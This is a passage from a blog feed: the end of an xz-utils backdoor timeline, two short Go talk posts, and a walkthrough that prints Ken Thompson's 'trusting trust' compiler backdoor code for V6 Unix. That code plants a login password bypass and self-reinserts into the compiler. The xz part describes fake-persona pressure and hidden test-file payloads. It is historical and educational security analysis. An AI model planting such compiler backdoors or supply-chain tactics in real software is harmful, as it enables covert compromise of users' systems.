<b>2022-06-10</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=aa75c5563a760aea3aa23d997d519e702e82726b">first commit with “Jia Tan” as author in git metadata</a> (“Tests: Created tests for hardware functions”). Note also that there was one earlier commit on 2022-02-07 that had the full name set only to jiat75.
<p>
<b>2022-06-14</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=0354d6cce3ff98ea6f927107baf216253f6ce2bb">only commit with “jiat75@gmail.com” as author</a>. This could have been a temporary git misconfiguration on Jia Tan’s side, forgetting to use their usual fake email address.
<p>
<b>2022-06-14</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html">pressure email</a>. “With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?”
<p>
<b>2022-06-21</b>: Dennis Ens sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html">pressure email</a>. “I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C? Trying to maintain both means that neither are maintained well.”
<p>
<b>2022-06-22</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html">pressure email</a> to C patch thread. “Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?”
<p>
<b>2022-06-29</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00571.html">replies</a>: “As I have hinted in earlier emails, Jia Tan may have a bigger role in the project in the future. He has been helping a lot off-list and is practically a co-maintainer already. :-) I know that not much has happened in the git repository yet but things happen in small steps. In any case some change in maintainership is already in progress at least for XZ Utils.”
<a class=anchor href="#jia_tan_becomes_maintainer"><h2 id="jia_tan_becomes_maintainer">Jia Tan becomes maintainer</h2></a>
<p>
At this point Lasse seems to have started working even more closely with Jia Tan. Brian Krebs <a href="https://infosec.exchange/@briankrebs/112197305365490518">observes</a> that many of these email addresses never appeared elsewhere on the internet, even in data breaches (nor again in xz-devel). It seems likely that they were fakes created to push Lasse to give Jia more control. It worked. Over the next few months, Jia started replying to threads on xz-devel authoritatively about the upcoming 5.4.0 release.
<p>
<b>2022-09-27</b>: Jia Tan gives <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00593.html">release summary</a> for 5.4.0. (“The 5.4.0 release that will contain the multi threaded decoder is planned for December. The list of open issues related to 5..4.0 [sic] in general that I am tracking are...”)
<p>
<b>2022-10-28</b>: Jia Tan <a href="https://github.com/JiaT75?tab=overview&from=2022-10-01&to=2022-10-31">added to the Tukaani organization</a> on GitHub. Being an organization member does not imply any special access, but it is a necessary step before granting maintainer access.
<p>
<b>2022-11-30</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=764955e2d4f2a5e8d6d6fec63af694f799e050e7">changes bug report email</a> from his personal address to an alias that goes to him and Jia Tan, notes in README that “the project maintainers Lasse Collin and Jia Tan can be reached via <a href="mailto:xz@tukaani.org">xz@tukaani.org</a>”.
<p>
<b>2022-12-30</b>: Jia Tan merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=8ace358d65059152d9a1f43f4770170d29d35754">a batch of commits directly into the xz repo</a> (“CMake: Update .gitignore for CMake artifacts from in source build”). At this point we know they have commit access. Interestingly, a <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=799ead162de63b8400733603d3abcd2e1977bdca">few commits later</a> in the same batch is the only commit with a different full name: “Jia Cheong Tan”.
<p>
<b>2023-01-11</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=18b845e69752c975dfeda418ec00eda22605c2ee">tags and builds his final release</a>, v5.4.1.
<p>
<b>2023-03-18</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6ca8046ecbc7a1c81ee08f544bfd1414819fb2e8">tags and builds their first release</a>, v5.4.2.
<p>
<b>2023-03-20</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/6403e93344476972e908ce17e8244f5c2b957dfd">updates Google oss-fuzz configuration</a> to send bugs to them.
<p>
<b>2023-06-22</b>: Hans Jansen sends <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=23b5c36fb71904bfbe16bb20f976da38dadf6c3b">a pair</a> of <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=b72d21202402a603db6d512fb9271cfa83249639">patches</a>, merged by Lasse Collin, that use the “<a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a>” feature to select a fast CRC function at startup time. The final commit is <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ee44863ae88e377a5df10db007ba9bfadde3d314">reworked by Lasse Collin</a> and merged by Jia Tan. This change is important because it provides a hook by which the backdoor code can modify the global function tables before they are remapped read-only. While this change could be an innocent performance optimization by itself, Hans Jansen returns in 2024 to promote the backdoored xz and otherwise does not exist on the internet.
<p>
<b>2023-07-07</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/d2e42b2e489eac6fe6268e381b7db151f4c892c5">disables ifunc support during oss-fuzz builds</a>, claiming ifunc is incompatible with address sanitizer. This may well be innocuous on its own, although it is also more groundwork for using ifunc later.
<p>
<b>2024-01-19</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=c26812c5b2c8a2a47f43214afe6b0b840c73e4f5">moves web site to GitHub pages</a>, giving them control over the XZ Utils web page. Lasse Collin presumably created the DNS records for the xz.tukaani.org subdomain that points to GitHub pages. After the attack was discovered, Lasse Collin deleted this DNS record to move back to <a href="https://tukaani.org">tukaani.org</a>, which he controls.
<a class=anchor href="#attack_begins"><h2 id="attack_begins">Attack begins</h2></a>
<p>
<b>2024-02-23</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">merges hidden backdoor binary code</a> well hidden inside some binary test input files. The README already said (from long before Jia Tan showed up) “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” Having these kinds of test files is very common for this kind of library. Jia Tan took advantage of this to add a few files that wouldn’t be carefully reviewed.
<p>
<b>2024-02-24</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429">tags and builds v5.6.0</a> and publishes an xz-5.6.0.tar.gz distribution with an extra, malicious build-to-host.m4 that adds the backdoor when building a deb/rpm package. This m4 file is not present in the source repository, but many other legitimate ones are added during packaging as well, so it’s not suspicious by itself. But the script has been modified from the usual copy to add the backdoor. See my <a href="xz-script">xz attack shell script walkthrough post</a> for more.
<p>
<b>2024-02-24</b>: Gentoo <a href="https://bugs.gentoo.org/925415">starts seeing crashes in 5.6.0</a>. This seems to be an actual ifunc bug, rather than a bug in the hidden backdoor, since this is the first xz with Hans Jansen’s ifunc changes, and Gentoo does not patch sshd to use libsystemd, so it doesn’t have the backdoor.
<p>
<b>2024-02-26</b>: Debian <a href="https://tracker.debian.org/news/1506761/accepted-xz-utils-560-01-source-into-unstable/">adds xz-utils 5.6.0-0.1</a> to unstable.
<p>
<b>2024-02-27</b>: Jia Tan starts emailing Richard W.M. Jones to update Fedora 40 (privately confirmed by Rich Jones).
<p>
<b>2024-02-28</b>: Debian <a href="https://tracker.debian.org/news/1507917/accepted-xz-utils-560-02-source-into-unstable/">adds xz-utils 5.6.0-0.2</a> to unstable.
<p>
<b>2024-02-28</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=a100f9111c8cc7f5b5f0e4a5e8af3de7161c7975">breaks landlock detection</a> in the configure script by adding a subtle typo in the C program used to check for <a href="https://docs.kernel.org/userspace-api/landlock.html">landlock support</a>. The configure script tries to build and run the C program to check for landlock support, but since the C program has a syntax error, it will never build and run, and the script will always decide there is no landlock support. Lasse Collin is listed as the committer; he may have missed the subtle typo, or the committer field may be forged. Probably the former, since Jia Tan did not bother to forge the committer on his many other changes. This patch seems to be setting up for something besides the sshd change, since landlock support is part of the xz command and not liblzma. Exactly what is unclear.
<p>
<b>2024-02-29</b>: On GitHub, @teknoraver <a href="https://github.com/systemd/systemd/pull/31550">sends pull request</a> to stop linking liblzma into libsystemd. It appears that this would have defeated the attack. <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Kevin Beaumont speculates</a> that knowing this was on the way may have accelerated the attacker’s schedule. @teknoraver <a href="https://news.ycombinator.com/item?id=39916125">commented on HN</a> that the liblzma PR was one in a series of dependency slimming changes for libsystemd; there were <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1917693005">two</a> <a href="https://github.com/systemd/systemd/pull/31131#issuecomment-1918667390">mentions</a> of it in late January.
<p>
<b>2024-03-04</b>: RedHat distributions <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2267598">start seeing Valgrind errors</a> in liblzma’s <code>_get_cpuid</code> (the entry to the backdoor). The race is on to fix this before the Linux distributions dig too deeply.
<p>
<b>2024-03-05</b>: The <a href="https://github.com/systemd/systemd/commit/3fc72d54132151c131301fc7954e0b44cdd3c860">libsystemd PR is merged</a> to remove liblzma. Another race is on, to get the backdoored liblzma into Linux distributions before this change breaks the approach entirely.
<p>
<b>2024-03-05</b>: Debian <a href="https://tracker.debian.org/news/1509743/xz-utils-560-02-migrated-to-testing/">adds xz-utils 5.6.0-0.2</a> to testing.
<p>
<b>2024-03-05</b>: Jia Tan commits <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ed957d39426695e948b06de0ed952a2fbbe84bd1">two ifunc</a> <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=4e1c97052b5f14f4d6dda99d12cbbd01e66e3712">bug fixes</a>. These seem to be real fixes for the actual ifunc bug. One commit links to the Gentoo bug and also typos an <a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=114115">upstream GCC bug</a>.
<p>
<b>2024-03-08</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=82ecc538193b380a21622aea02b0ba078e7ade92">commits purported Valgrind fix</a>. This is a misdirection, but an effective one.
<p>
<b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=74b138d2a6529f2c07729d7c77b1725a8e8b16f1">commits updated backdoor files</a>. This is the actual Valgrind fix, changing the two test files containing the attack code. “The original files were generated with random local to my machine. To better reproduce these files in the future, a constant seed was used to recreate these files.”
<p>
<b>2024-03-09</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=fd1b975b7851e081ed6e5cf63df946cd5cbdbb94">tags and builds v5.6.1</a> and publishes the xz 5.6.1 distribution, containing a new backdoor. To date I have not seen any analysis of how the old and new backdoors differ.
<p>
<b>2024-03-20</b>: Lasse Collin sends LKML a patch set <a href="https://lkml.org/lkml/2024/3/20/1009">replacing his personal email</a> with <a href="https://lkml.org/lkml/2024/3/20/1008">both himself and Jia Tan</a> as maintainers of the xz compression code in the kernel. There is no indication that Lasse Collin was acting nefariously here, just cleaning up references to himself as sole maintainer. Of course, Jia Tan may have prompted this, and being able to send xz patches to the Linux kernel would have been a nice point of leverage for Jia Tan’s future work. We’re not at <a href="nih">trusting trust</a> levels yet, but it would be one step closer.
<p>
<b>2024-03-25</b>: Hans Jansen is back (!), <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708">filing a Debian bug</a> to get xz-utils updated to 5.6.1. Like in the 2022 pressure campaign, more name###@mailhost addresses that don’t otherwise exist on the internet show up to advocate for it.
<p>
<b>2024-03-27</b>: Debian updates to 5.6.1.
<p>
<b>2024-03-28</b>: Jia Tan <a href="https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417">files an Ubuntu bug</a> to get xz-utils updated to 5.6.1 from Debian.
<a class=anchor href="#attack_detected"><h2 id="attack_detected">Attack detected</h2></a>
<p>
<b>2024-03-28</b>: Andres Freund discovers bug, privately notifies Debian and distros@openwall. RedHat assigns CVE-2024-3094.
<p>
<b>2024-03-28</b>: Debian <a href="https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/">rolls back 5.6.1</a>, introducing 5.6.1+really5.4.5-1.
<p>
<b>2024-03-28</b>: Arch Linux <a href="https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/881385757abdc39d3cfea1c3e34ec09f637424ad">changes 5.6.1 to build from Git</a>.
<p>
<b>2024-03-29</b>: Andres Freund <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">posts backdoor warning</a> to public oss-security@openwall list, saying he found it “over the last weeks”.
<p>
<b>2024-03-29</b>: RedHat <a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users">announces that the backdoored xz shipped</a> in Fedora Rawhide and Fedora Linux 40 beta.
<p>
<b>2024-03-30</b>: Debian <a href="https://fulda.social/@Ganneff/112184975950858403">shuts down builds</a> to rebuild their build machines using Debian stable (in case the malware xz escaped their sandbox?).
<p>
<b>2024-03-30</b>: Haiku OS <a href="https://github.com/haikuports/haikuports/commit/3644a3db2a0ad46971aa433c105e2cce9d141b46">moves to GitHub source repo snapshots</a>.
<a class=anchor href="#further_reading"><h2 id="further_reading">Further Reading</h2></a>
<ul>
<li>
Evan Boehs, <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor">Everything I know about the XZ backdoor</a> (2024-03-29).
<li>
Filippo Valsorda, <a href="https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b">Bluesky</a> re backdoor operation (2024-03-30).
<li>
Michał Zalewski, <a href="https://lcamtuf.substack.com/p/technologist-vs-spy-the-xz-backdoor">Techies vs spies: the xz backdoor debate</a> (2024-03-30).
<li>
Michał Zalewski, <a href="https://lcamtuf.substack.com/p/oss-backdoors-the-allure-of-the-easy">OSS backdoors: the folly of the easy fix</a> (2024-03-31).
<li>
Connor Tumbleson, <a href="https://connortumbleson.com/2024/03/31/watching-xz-unfold-from-afar/">Watching xz unfold from afar</a> (2024-03-31).
<li>
nugxperience, <a href="https://twitter.com/nugxperience/status/1773906926503591970">Twitter</a> re awk and rc4 (2024-03-29)
<li>
birchb0y, <a href="https://twitter.com/birchb0y/status/1773871381890924872">Twitter</a> re time of day of commit vs level of evil (2024-03-29)
<li>
Dan Feidt, <a href="https://unicornriot.ninja/2024/xz-utils-software-backdoor-uncovered-in-years-long-hacking-plot/">‘xz utils’ Software Backdoor Uncovered in Years-Long Hacking Plot</a> (2024-03-30)
<li>
smx-smz, <a href="https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504">[WIP] XZ Backdoor Analysis and symbol mapping</a>
<li>
Dan Goodin, <a href="https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/">What we know about the xz Utils backdoor that almost infected the world</a> (2024-04-01)
<li>
Akamai Security Intelligence Group, <a href="https://www.akamai.com/blog/security-research/critical-linux-backdoor-xz-utils-discovered-what-to-know">XZ Utils Backdoor — Everything You Need to Know, and What You Can Do</a> (2024-04-01)
<li>
Kevin Beaumont, <a href="https://doublepulsar.com/inside-the-failed-attempt-to-backdoor-ssh-globally-that-got-caught-by-chance-bbfe628fafdd">Inside the failed attempt to backdoor SSH globally — that got caught by chance</a> (2024-03-31)
<li>
amlweems, <a href="https://github.com/amlweems/xzbot">xzbot: notes, honeypot, and exploit demo for the xz backdoor</a> (2024-04-01)
<li>
Rhea Karty and Simon Henniger, <a href="https://rheaeve.substack.com/p/xz-backdoor-times-damned-times-and">XZ Backdoor: Times, damned times, and scams</a> (2024-03-30)
<li>
Andy Greenberg and Matt Burgess, <a href="https://www.wired.com/story/jia-tan-xz-backdoor/">The Mystery of ‘Jia Tan,’ the XZ Backdoor Mastermind</a> (2024-04-03)
<li>
<a href="https://risky.biz/RB743/">Risky Business #743 -- A chat about the xz backdoor with the guy who found it</a> (2024-04-03)</ul>
Go Changestag:research.swtch.com,2012:research.swtch.com/gochanges2023-12-08T12:00:00-05:002023-12-08T12:02:00-05:00The way Go changes, and how to improve it with telemetry.
<p>
I opened GopherCon (USA) in October with the talk “Go Changes”,
which looked at how Go evolves, the importance of data in making shared decisions,
and why opt-in telemetry in the Go toolchain
is a useful, effective, and appropriate new source of data.
<p>
I re-recorded it at home and have posted it here:
<div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;">
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/BNmxtp26I5s?si=3ZpIWEA72ehzJrVO" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
</div>
<p>
Links:
<ul>
<li>
<a href="https://go.dev/s/proposal">The Go Proposal Process</a>
<li>
<a href="sample">The Magic of Sampling</a>
<li>
<a href="telemetry">Go Telemetry Blog Posts</a></ul>
<p>
Errata:
<ul>
<li>
There is a mistake in the probability discussion: (2/3)<sup>100</sup> is about 2.46×10<sup>–18</sup>, not 1.94×10<sup>–48</sup>. The latter is (1/3)<sup>100</sup>. The probability of pulling 100 gophers without getting the third color remains vanishingly small. Apologies for the mistake.</ul>
Go Testing By Exampletag:research.swtch.com,2012:research.swtch.com/testing2023-12-05T08:00:00-05:002023-12-05T08:02:00-05:00The importance of testing, and twenty tips for writing good tests.
<p>
I opened GopherCon Australia in early November with the talk “Go Testing By Example”.
Being the first talk, there were some A/V issues, so I re-recorded it at home and have posted it here:
<div style="border: 1px solid black; margin: auto; margin-top: 1em; margin-bottom: 1em; width:560px; height:315px;">
<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/X4rxi9jStLo?si=DJiEGUPNxPlYnlWL" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>
</div>
<p>
Here are the 20 tips from the talk:
<ol>
<li>
Make it easy to add new test cases.
<li>
Use test coverage to find untested code.
<li>
Coverage is no substitute for thought.
<li>
Write exhaustive tests.
<li>
Separate test cases from test logic.
<li>
Look for special cases.
<li>
If you didn’t add a test, you didn’t fix the bug.
<li>
Not everything fits in a table.
<li>
Test cases can be in testdata files.
<li>
Compare against other implementations.
<li>
Make test failures readable.
<li>
If the answers can change, write code to update them.
<li>
Use <a href="https://pkg.go.dev/golang.org/x/tools/txtar">txtar</a> for multi-file test cases.
<li>
Annotate existing formats to create testing mini-languages.
<li>
Write parsers and printers to simplify tests.
<li>
Code quality is limited by test quality.
<li>
Scripts make good tests.
<li>
Try <a href="https://pkg.go.dev/rsc.io/script">rsc.io/script</a> for your own script-based test cases.
<li>
Improve your tests over time.
<li>
Aim for continuous deployment.</ol>
<p>
Enjoy!
Running the “Reflections on Trusting Trust” Compilertag:research.swtch.com,2012:research.swtch.com/nih2023-10-25T21:00:00-04:002023-10-25T21:00:00-04:00Ken Thompson’s Turing award lecture, running in your browser.
<style>
body { font-family: 'Minion 3'; }
.nih pre { padding-top: 0.2em; margin: 0; }
.nih { border-spacing: 0; }
.nih tr { padding: 0; }
.nih td { padding: 0.5em; min-width: 25em; }
.nih td { vertical-align: top; }
.nih td.l { font-style: italic; }
.nih td.r { background-color: #eee; }
.nih td p { text-align: right; clear: both; margin-block-start: 0; margin-block-end: 0; }
.nih td div { float: right; }
.string { color: #700; }
.del { color: #aaa; }
.ins { font-weight: bold; }
</style>
<p>
Supply chain security is a hot topic today, but it is a very old problem.
In October 1983, 40 years ago this week,
Ken Thompson chose supply chain security as the topic for his Turing award lecture,
although the specific term wasn’t used back then.
(The field of computer science was still young and small enough that the ACM conference where Ken spoke was
the “Annual Conference on Computers.”)
Ken’s lecture was later published in <i>Communications of the ACM</i>
under the title “<a href="https://dl.acm.org/doi/pdf/10.1145/358198.358210">Reflections on Trusting Trust</a>.”
It is a classic paper, and a short one (3 pages);
if you haven’t read it yet, you should. This post will still be here when you get back.
</p>
<p>
In the lecture, Ken explains in three steps how to modify a C compiler binary
to insert a backdoor when compiling the “login” program,
leaving no trace in the source code.
In this post, we will run the backdoored compiler using Ken’s actual code.
But first, a brief summary of the important parts of the lecture.
</p>
<a class=anchor href="#step1"><h2 id="step1">Step 1: Write a Self-Reproducing Program</h2></a>
<p>
Step 1 is to write a program that prints its own source code.
Although the technique was not widely known in 1975,
such a program is now known in computing as a “<a href="https://en.wikipedia.org/wiki/Quine_(computing)">quine</a>,”
popularized by Douglas Hofstadter in <i>Gödel, Escher, Bach</i>.
Here is a Python quine, from <a href="https://cs.lmu.edu/~ray/notes/quineprograms/">this collection</a>:
</p>
<pre>
s=<span class="string">'s=%r;print(s%%s)'</span>;print(s%s)
</pre>
<p>
And here is a slightly less cryptic Go quine:
</p>
<pre>
package main
func main() { print(q + "\x60" + q + "\x60") }
var q = <span class=string>`package main
func main() { print(q + "\x60" + q + "\x60") }
var q = `</span>
</pre>
<p>The general idea of the solution is to put the text of the program into a string literal, with some kind of placeholder where the string itself should be repeated. Then the program prints the string literal, substituting that same literal for the placeholder.
In the Python version, the placeholder is <code>%r</code>;
in the Go version, the placeholder is implicit at the end of the string.
For more examples and explanation, see my post “<a href="zip">Zip Files All The Way Down</a>,” which uses a Lempel-Ziv quine to construct a zip file that contains itself.
</p>
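<p>
Since the compiler we are about to backdoor is a C compiler, a C version of the same trick may be useful to have in mind. This is just one of many possible C quines, written here as an illustration rather than taken from Ken’s code:
</p>
<pre>
#include &lt;stdio.h&gt;
char*s="#include &lt;stdio.h&gt;%cchar*s=%c%s%c;%cint main(){printf(s,10,34,s,34,10,10);}%c";
int main(){printf(s,10,34,s,34,10,10);}
</pre>
<p>
As in the Python and Go versions, the string holds the entire program once, with <code>%c</code> and <code>%s</code> placeholders standing in for the newlines, the quotes, and the string itself.
</p>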
<a class=anchor href="#step2"><h2 id="step2">Step 2: Compilers Learn</h2></a>
<p>
Step 2 is to notice that when a compiler compiles itself,
there can be important details that persist only in the compiler
binary, not in the actual source code.
Ken gives the example of the numeric values of escape sequences in C strings.
You can imagine a compiler containing code like this during
the processing of escaped string literals:
</p>
<pre>
c = next();
if(c == '\\') {
	c = next();
	if(c == 'n')
		c = '\n';
}
</pre>
<p>
That code is responsible for processing the two character sequence <code>\n</code>
in a string literal
and turning it into a corresponding byte value,
specifically <code>’\n’</code>.
But that’s a circular definition, and the first time you write code like that it won’t compile.
So instead you write <code>c = 10</code>,
you compile and install the compiler, and <i>then</i> you can change
the code to <code>c = ’\n’</code>.
The compiler has “learned” the value of <code>’\n’</code>,
but that value only appears in the compiler binary,
not in the source code.
</p>
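<p>
Concretely, the bootstrap version of that code spells the value out, something like this (a sketch of the idea, not Ken’s exact source):
</p>
<pre>
c = next();
if(c == '\\') {
	c = next();
	if(c == 'n')
		c = 10;	/* no escape sequence needed to say 10 */
}
</pre>
<p>
Once a compiler built from this source is installed, the <code>10</code> can be rewritten as <code>'\n'</code>, giving the version shown above, and the value 10 survives only in the compiler binary.
</p>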
<a class=anchor href="#step3"><h2 id="step3">Step 3: Learn a Backdoor</h2></a>
<p>
Step 3 is to put these together to help the compiler “learn”
to miscompile the target program (<code>login</code> in the lecture).
It is fairly straightforward to write code in a compiler
to recognize a particular input program and modify its code,
but that code would be easy to find if the compiler source were inspected.
Instead, we can go deeper, making two changes to the compiler:
</p>
<ol>
<li>Recognize <code>login</code> and insert the backdoor.
<li>Recognize the compiler itself and insert the code for these two changes.
</ol>
<p>
The “insert the code for these two changes” step requires being able to write
a self-reproducing program: the code must reproduce itself
into the new compiler binary.
At this point, the compiler binary has “learned” the miscompilation steps,
and the clean source code can be restored.
</p>
<a class=anchor href="#run"><h2 id="run">Running the Code</h2></a>
<p>At the Southern California Linux Expo in March 2023,
Ken gave the closing keynote,
<a href="https://www.youtube.com/live/kaandEt_pKw?si=RGKrC8c0B9_AdQ9I&t=643">a delightful talk</a>
about his 75-year effort accumulating what must be the world’s
largest privately held digital music collection,
complete with actual jukeboxes and a player piano (video opens at 10m43s, when his talk begins).
During the Q&A session, someone <a href="https://www.youtube.com/live/kaandEt_pKw?si=koOlE35Q3mjqH4yf&t=3284">jokingly asked</a> about the Turing award lecture, specifically
“can you tell us right now whether you have a backdoor into every copy of gcc and Linux still today?”
Ken replied:
</p>
<blockquote>
I assume you’re talking about some paper I wrote a long time ago.
No, I have no backdoor.
That was very carefully controlled, because there were some spectacular fumbles before that.
I got it released, or I got somebody to steal it from me, in a very controlled sense,
and then tracked whether they found it or not.
And they didn’t.
But they broke it, because of some technical effect,
but they didn’t find out what it was and then track it.
So it never got out, if that’s what you’re talking about.
I hate to say this in front of a big audience, but
the one question I’ve been waiting for since I wrote that paper is
“you got the code?”
Never been asked.
I still have the code.
</blockquote>
<p>Who could resist that invitation!?
Immediately after watching the video on YouTube in September 2023,
I emailed Ken and asked him for the code.
Despite my being six months late, he said I was the first person to ask
and mailed back an attachment called <code>nih.a</code>,
a cryptic name for a cryptic program.
(Ken tells me it does in fact stand for “not invented here.”)
Normally today, <code>.a</code> files are archives containing
compiler object files,
but this one contains two source files.</p>
<p>
The code applies cleanly to the C compiler from the
<a href="https://en.wikipedia.org/wiki/Research_Unix">Research Unix Sixth Edition (V6)</a>.
I’ve posted an online emulator that runs V6 Unix programs
and populated it with some old files from Ken and Dennis,
including <code>nih.a</code>.
Let’s actually run the code.
You can <a href="https://research.swtch.com/v6">follow along in the simulator</a>.</p>
<table class="nih">
<tr>
<td class=l>
<p>Login as <code>ken</code>, password <code>ken</code>.<br>
(The password is normally not shown.)
<td class=r><pre>login: <b>ken</b>
Password: <b>ken</b>
% <b>who</b>
ken tty8 Aug 14 22:06
%
</pre>
<tr>
<td class=l>
<p>Change to and list the <code>nih</code> directory,<br>
discovering a Unix archive.
<td class=r><pre>
% <b>chdir nih</b>
% <b>ls</b>
nih.a
</pre>
<tr>
<td class=l>
<p>Extract <code>nih.a</code>.
<td class=r><pre>
% <b>ar xv nih.a</b>
x x.c
x rc
</pre>
<tr>
<td class=l>
<p>Let’s read <code>x.c</code>, a C program.
<td class=r><pre>
% <b>cat x.c</b>
</pre>
<tr>
<td class=l>
<p>Declare the global variable <code>nihflg</code>,<br>
of implied type <code>int</code>.
<td class=r><pre>
nihflg;
</pre>
<tr>
<td class=l>
<p>
Define the function <code>codenih</code>, with implied<br>
return type <code>int</code> and no arguments.<br>
The compiler will be modified to call <code>codenih</code><br>
during preprocessing, for each input line.
<td class=r><pre>
codenih()
{
char *p,*s;
int i;
</pre>
<tr>
<td class=l>
<p><code>cc -p</code> prints the preprocessor output<br>
instead of invoking the compiler back end.<br>
To avoid discovery, do nothing when <code>-p</code> is used.<br>
The implied return type of <code>codenih</code> is <code>int</code>,<br>
but early C allowed omitting the return value.
<td class=r><pre>
if(pflag)
return;
</pre>
<tr>
<td class=l>
<p>Skip leading tabs in the line.
<td class=r><pre>
p=line;
while(*p=='\t')
p++;
</pre>
<tr>
<td class=l>
<p>Look for the line<br>
“<code>namep = crypt(pwbuf);</code>” from <a href="login.c#crypt"><code>login.c</code></a>.<br>
If not found, jump to <code>l1</code>.
<td class=r><pre>
s="namep = crypt(pwbuf);";
for(i=0;i<21;i++)
if(s[i]!=p[i])
goto l1;
</pre>
<tr>
<td class=l>
<p>Define <code>login</code> backdoor code <code>s</code>, which does:<br>
Check for the password “<code>codenih</code>”.<br>
If found, modify <code>namep</code> and <code>np</code><br>
so that the code that follows in <br>
<a href="login.c#crypt"><code>login.c</code></a> will accept the password.
<td class=r><pre>
p=+i;
s="for(c=0;c<8;c++)"
"if(\"codenih\"[c]!=pwbuf[c])goto x1x;"
"while(*namep)namep++;"
"while(*np!=':')np++;x1x:";
</pre>
<tr>
<td class=l>
<p>With the <code>p=+i</code> from above,<br>
this is: <code>strcpy(p+i, s); return;</code>,<br>
appending the backdoor to the line.<br>
In early C, <code>+=</code> was spelled <code>=+</code>.<br>
The loop is <code>strcpy</code>, and <code>goto l4</code><br>
jumps to the end of the function.
<td class=r><pre>
for(i=0;;i++)
if(!(*p++=s[i]))
break;
goto l4;
</pre>
<tr>
<td class=l>
<p>No match for <code>login</code> code. Next target:<br>
the distinctive line “<code>av[4] = "-P";</code>”<br>
from <a href="cc.c#av4">cc.c</a>. If not found, jump to <code>l2</code>.
<td class=r><pre>
l1:
s="av[4] = \"-P\";";
for(i=0;i<13;i++)
if(s[i]!=p[i])
goto l2;
</pre>
<tr>
<td class=l>
<p>Increment <code>nihflg</code> to 1 to remember<br>
evidence of being in <code>cc.c</code>, and return.
<td class=r><pre>
nihflg++;
goto l4;
</pre>
<tr>
<td class=l>
<p>
Next target: <a href="cc.c#getline">input reading loop in <code>cc.c</code></a>,<br>
but only if we’ve seen the <code>av[4]</code> line too:<br>
the text “<code>while(getline()) {</code>”<br>
is too generic and may be in other programs.<br>
If not found, jump to <code>l3</code>.
<td class=r><pre>
l2:
if(nihflg!=1)
goto l3;
s="while(getline()) {";
for(i=0;i<18;i++)
if(s[i]!=p[i])
goto l3;
</pre>
<tr>
<td class=l>
<p>
Append input-reading backdoor: call <code>codenih</code><br>
(this very code!) after reading each line.<br>
Increment <code>nihflg</code> to 2 to move to next state.
<td class=r><pre>
p=+i;
s="codenih();";
for(i=0;;i++)
if(!(*p++=s[i]))
break;
nihflg++;
goto l4;
</pre>
<tr>
<td class=l>
